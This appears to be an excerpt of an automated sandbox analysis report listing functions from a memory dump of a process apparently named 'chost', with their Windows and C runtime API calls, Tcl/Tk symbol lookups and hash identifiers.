Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 9ab76d91146c12c683e9f8f48505d85182839996bd983f3890179b410bd51a70
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: D641A432A1C201C7EA349B37A59127977A4EB56B94F108279DACEC77D1CF2DE402CB91

Function 00007FF694367F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF69436802A

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
Instruction ID: 2fa1919d1eb75bb7de06042c7f166b5fec0f4c68b798813cb173d2aed1ecb6bb
Opcode Fuzzy Hash: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
Instruction Fuzzy Hash: E421F621B0D652A5FE349B3365853BAA651FF49BC8F8C8878EE4C87786CE7DE041C610

Function 00007FF69437B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437BA32

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: 4138969a18798ce02ba3a310b9bb7c338e5250efa121d14e20c41e60841d6992
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: 07313E31A1C642C5E7B16B76848167C3660EB50BA8F5181BDE9AD833D2DE7CB441C721

Function 00007FF6943799D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6943799FF

Part of subcall function 00007FF694379AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF694379B1D
Part of subcall function 00007FF694379AF8: GetProcAddress.KERNEL32 ref: 00007FF694379B33
Part of subcall function 00007FF694379AF8: FreeLibrary.KERNEL32 ref: 00007FF694379B5A

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 6e408cad4b90fce7fc6ed67e6c95df8198ed71b5e6b5831ef4927f7495bdc925
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: BD217F32A09782CAFB648F79C4842EC33A4EB04728F548679D69D86BD5EF38D544C740

Function 00007FF694376004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694375F69

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 7846faf933c38a9319817f18cf0c2aeb26fee625e99eec61bc176603a3917ccd
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 88115432A1C642C1EA79AF62948027DA264EF95B80F94807DEBCCD7E96DF3DE440C700

Function 00007FF6943863C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943863E7

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 18b7f6026fffbf18c35cf9c540faf7e0e14103eaa1544f07c85eaf2fddd62a22
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: FC21537261864186DB718F2AD48037DB6A1EB84B54F64C278E69DC77D5DF7CD401CB00

Function 00007FF69437042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694370480

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: d06a6e3bc6d496ccfc456157caa01151f5c99b5d23cfc8bb8685d1509816ee5a
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 35018271A4C74180E924DF639981069A6A1EF85FE4B588679DE9C97BD6DE3CE101C700

Function 00007FF694377F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694377FAA

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction ID: 95280e2d63b2beb2ebc8aa08208ffa94789011b6006ea3a49d0b2a1a405a8775
Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction Fuzzy Hash: BA016930A1D682C0FEB4AA7366C117962D0EF047A0F54C6BDEA9CC2BC6DF6CB451C611

Function 00007FF6943782A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943782C1

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: 58937605b51a4778ffaa95c006d5929aa208b1e18270b931b99b5550bb3b4668
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 24E0ECB0E0C607C6F7793AB646C217D1150DF56341F81C6BCEA88962C3DE2C7859D721

Function 00007FF69437EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF69437B39A,?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA), ref: 00007FF69437EC5D

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: 674846394c72135350ec9c416d6339bf667f1bd8d8ed196622426a5546e8b49d
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: 5EF0F968B0D207C1FE755A7799E23B95A94DF89B81F4CD5B8C98EC63D2EE1CA481C210

Function 00007FF69437D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF694370D00,?,?,?,00007FF69437236A,?,?,?,?,?,00007FF694373B59), ref: 00007FF69437D6AA

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: c4e8d760e671bee1265a566b8a3fe97f7fe7e1bef0c549d29f9bc483c7ea1201
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 28F03420A2D30284FE74667358D12B95290CF94BA0F8882B8D8AEC53C2EE2CB480C620

Non-executed Functions

Function 00007FF6943676B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6943676C7
GetLastError.KERNEL32 ref: 00007FF6943676D9
GetProcAddress.KERNEL32 ref: 00007FF694367715
GetLastError.KERNEL32 ref: 00007FF694367727
GetProcAddress.KERNEL32 ref: 00007FF694367740
GetLastError.KERNEL32 ref: 00007FF694367752
GetProcAddress.KERNEL32 ref: 00007FF69436776B
GetLastError.KERNEL32 ref: 00007FF69436777D
GetProcAddress.KERNEL32 ref: 00007FF694367799
GetLastError.KERNEL32 ref: 00007FF6943677AB
GetProcAddress.KERNEL32 ref: 00007FF6943677C7
GetLastError.KERNEL32 ref: 00007FF6943677D9
GetProcAddress.KERNEL32 ref: 00007FF6943677F5
GetLastError.KERNEL32 ref: 00007FF694367807
GetProcAddress.KERNEL32 ref: 00007FF694367823
GetLastError.KERNEL32 ref: 00007FF694367835
GetProcAddress.KERNEL32 ref: 00007FF694367851
GetLastError.KERNEL32 ref: 00007FF694367863

Strings

Tcl_ConditionWait, xrefs: 00007FF694367989, 00007FF6943679AB
Tcl_EvalEx, xrefs: 00007FF694367BB1, 00007FF694367BD3
Tcl_CreateInterp, xrefs: 00007FF69436770B, 00007FF69436772D
Tcl_GetString, xrefs: 00007FF694367A9D, 00007FF694367ABF
Tcl_EvalFile, xrefs: 00007FF694367B83, 00007FF694367BA5
Tcl_ThreadAlert, xrefs: 00007FF6943679E5, 00007FF694367A07
Tk_GetNumMainWindows, xrefs: 00007FF694367C97, 00007FF694367CB9
GetProcAddress, xrefs: 00007FF6943676EF
Tcl_GetVar2, xrefs: 00007FF694367A13, 00007FF694367A35
Tcl_CreateThread, xrefs: 00007FF694367819, 00007FF69436783B
Tcl_DoOneEvent, xrefs: 00007FF694367761, 00007FF694367783
Failed to get address for %hs, xrefs: 00007FF6943676E8
Tcl_DeleteInterp, xrefs: 00007FF6943677EB, 00007FF69436780D
Tcl_MutexFinalize, xrefs: 00007FF6943678FF, 00007FF694367921
Tcl_Alloc, xrefs: 00007FF694367C0D, 00007FF694367C2F
Tcl_Finalize, xrefs: 00007FF69436778F, 00007FF6943677B1
Tcl_SetVar2, xrefs: 00007FF694367A41, 00007FF694367A63
Tcl_NewByteArrayObj, xrefs: 00007FF694367AF9, 00007FF694367B1B
Tcl_GetCurrentThread, xrefs: 00007FF694367847, 00007FF694367869
Tcl_CreateObjCommand, xrefs: 00007FF694367A6F, 00007FF694367A91
Tcl_FindExecutable, xrefs: 00007FF694367736, 00007FF694367758
Tcl_ConditionFinalize, xrefs: 00007FF69436792D, 00007FF69436794F
Tcl_Init, xrefs: 00007FF6943676C0, 00007FF6943676DF
Tcl_Free, xrefs: 00007FF694367C3B, 00007FF694367C5D
Tcl_FinalizeThread, xrefs: 00007FF6943677BD, 00007FF6943677DF
Tcl_SetVar2Ex, xrefs: 00007FF694367B27, 00007FF694367B49
Tcl_GetObjResult, xrefs: 00007FF694367B55, 00007FF694367B77
Tcl_EvalObjv, xrefs: 00007FF694367BDF, 00007FF694367C01
Tcl_ThreadQueueEvent, xrefs: 00007FF6943679B7, 00007FF6943679D9
Tcl_JoinThread, xrefs: 00007FF694367875, 00007FF694367897
Tcl_ConditionNotify, xrefs: 00007FF69436795B, 00007FF69436797D
Tcl_MutexUnlock, xrefs: 00007FF6943678D1, 00007FF6943678F3
Tcl_NewStringObj, xrefs: 00007FF694367ACB, 00007FF694367AED
Tk_Init, xrefs: 00007FF694367C69, 00007FF694367C8B
Tcl_MutexLock, xrefs: 00007FF6943678A3, 00007FF6943678C5

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: d6d34ffba79c9cf7b9ae432525aacaa44dc78855b73e51e0693e33ab5c1dc0a1
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: AE029264A1DB0792FA35DB77A8D59B8B2A1EF04765B9481BDD41EC23A0EF3CB548C210

Function 00007FF69436D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF69436D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF69436D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF69436D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF69436D240
IsDebuggerPresent.KERNEL32 ref: 00007FF69436D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF69436D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF69436D2BC

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: d8c6b062e9219d83e5a2ee686fc4abe43069d8fed9d9821c92c2b84464b22ee0
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: A9313272619B8285EB709F61E8807EE7364FB84744F448439DA4E87B99EF7CD548C710

Function 00007FF694385C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF694385CB5

Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C

Part of subcall function 00007FF69437A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8

Part of subcall function 00007FF69437A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A979
Part of subcall function 00007FF69437A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A99E

_get_daylight.LIBCMT ref: 00007FF694385CA4

Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C

_get_daylight.LIBCMT ref: 00007FF694385F1A
_get_daylight.LIBCMT ref: 00007FF694385F2B
_get_daylight.LIBCMT ref: 00007FF694385F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: 165b0f244d4f5d43ebf412c6ee025a54cbd7c9b00b4b973127669f67b7f806e3
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: 3FD19D62A1824286EB34AF37D8D11B9A7A1EF84794F44C17DEA4DC7B96DE3CE441C740

Function 00007FF69437A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF69437A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF69437A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF69437A750
IsDebuggerPresent.KERNEL32 ref: 00007FF69437A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF69437A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF69437A79E

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 6dbc73b780dc91aa7294d30e8da47bf6571c999bc8b6125a66cbdcfa3ba5e67d
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 83317432618B8285D770DF36E8802AE73A4FB88754F544139EA9D87B55DF3CD145CB00

Function 00007FF6943818E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694381930
FindFirstFileExW.KERNEL32 ref: 00007FF694381A3A

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
